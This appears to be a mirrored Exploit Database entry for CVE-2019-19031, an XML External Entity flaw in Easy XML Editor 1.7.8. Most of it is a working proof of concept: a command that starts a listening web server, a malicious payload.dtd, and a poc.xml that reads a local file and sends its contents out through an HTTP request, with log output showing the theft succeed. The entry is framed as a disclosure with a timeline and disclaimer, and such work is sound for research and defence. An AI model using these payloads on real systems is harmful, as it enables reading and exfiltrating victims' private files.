Easy XML Editor 1.7.8 – XML External Entity Injection

• Exploit Database
• 38 阅读

• 作者： Javier Olmedo
  日期： 2020-01-20
• 类别：

  • local
  平台：

  • xml
• 来源：https://www.exploit-db.com/exploits/47945/

• # Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
  # Exploit Author: Javier Olmedo
  # Date: 2018-11-21
  # Vendor: Richard Wuerflein
  # Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
  # Affected Version: 1.7.8 and before
  # Patched Version: unpatched
  # Category: Local
  # Platform: XML
  # Tested on: Windows 10 Pro
  # CWE: https://cwe.mitre.org/data/definitions/611.html
  # CVE: 2019-19031
  # References:
  # https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/
   
  # 1. Technical Description
  # Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability
  # through the malicious XML file. This allows a malicious user to read arbitrary files.
   
  # 2. Proof Of Concept (PoC)
  # 2.1 Start a webserver to receive the connection.
  
  python -m SimpleHTTPServer 80
  
  # 2.2 Upload the payload.dtd file to your web server.
  
  <?xml version="1.0" encoding="UTF-8"?>
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
  %all;
  
  # 2.3 Create a SECRET.TXT file with any content in desktop.
  
  # 2.4 Open poc.xml
  
  <?xml version="1.0"?>
  <!DOCTYPE test [
  <!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
  <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
  %dtd;]>
  <pwn>&send;</pwn>
  
  # 2.5 Your web server will receive a request with the contents of the secret.txt file
  
  Serving HTTP on 0.0.0.0 port 8000 ...
  192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
  192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
  
  # 3. Timeline
  # 13, november 2019 - [RESEARCHER] Discover
  # 13, november 2019 - [RESEARCHER] Report to vendor support
  # 14, november 2019 - [DEVELOPER]Unrecognized vulnerability
  # 15, november 2019 - [RESEARCHER] Detailed vulnerability report
  # 22, november 2019 - [RESEARCHER] Public disclosure
  
  # 4. Disclaimer
  # The information contained in this notice is provided without any guarantee of use or otherwise.
  # The redistribution of this notice is explicitly permitted for insertion into vulnerability
  # databases, provided that it is not modified and due credit is granted to the author.
  # The author prohibits the malicious use of the information contained herein and accepts no responsibility.
  # All content (c)
  # Javier Olmedo